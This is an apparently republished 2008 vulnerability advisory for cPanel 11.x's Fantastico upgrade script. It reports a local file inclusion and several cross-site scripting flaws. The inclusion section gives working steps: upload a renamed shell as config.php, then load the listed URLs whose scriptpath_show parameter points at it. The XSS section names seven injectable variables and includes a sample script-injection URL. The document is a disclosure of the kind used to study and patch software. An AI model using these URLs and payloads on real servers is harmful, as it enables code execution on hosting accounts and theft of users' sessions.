Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:20789
HistoryNov 01, 2008 - 12:00 a.m.

Cpanel 11.x Local File Inclusion & Cross Site Scripting - Discovered By Khashayar Fereidani

2008-11-0100:00:00
vulners.com
21

Script : Cpanel 11.x

Type : Local File Inclusion & Cross Site Scripting

Risk : High


Discovered by : Khashayar Fereidani

**** I am 17 Years Old****

My Official Website : HTTP://FEREIDANI.IR

Team Website : Http://IRCRASH.COM

Team Members : Khashayar Fereidani - Hadi Kiamarsi - Sina YazdanMehr

Khashayar Fereidani Email : irancrash [ a t ] gmail [ d o t ] com


Local File Inclusion Vulnerability :

Note : Rename your shell to config.php and upload with your ftp account in ./ directory … , now
login in cpanel and
enter vulnerable address in url …

https://ServerIp:2083/frontend/x3/fantastico/autoinstall4imagesgalleryupgrade.php?action=GoAhead&scriptpath_show=/home/[youruser]/

https://ServerIp:2083/frontend/x2/fantastico/autoinstall4imagesgalleryupgrade.php?action=GoAhead&scriptpath_show=/home/[youruser]/

https://ServerIp:2083/frontend/x/fantastico/autoinstall4imagesgalleryupgrade.php?action=GoAhead&scriptpath_show=/home/[youruser]/


Cross site scripting :

File Address :
frontend/x3/fantastico/autoinstall4imagesgalleryupgrade.php?action=Upgrade%20to%201.7.4

Set Action as Upgrade%20to%201.7.4

Vulnerable Variables :

$localapp
$updatedir
$scriptpath_show
$domain_show
$thispage
$thisapp
$currentversion

For Example :
https://ServerIp:2083/frontend/x3/fantastico/autoinstall4imagesgalleryupgrade.php?action=Upgrade%20to%201.7.4&localapp=%22%3Cscript%3Ealert(%27xss%27)%3C/script%3E


                    Tnx : God

      HTTP://IRCRASH.COM HTTP://FEREIDANI.IR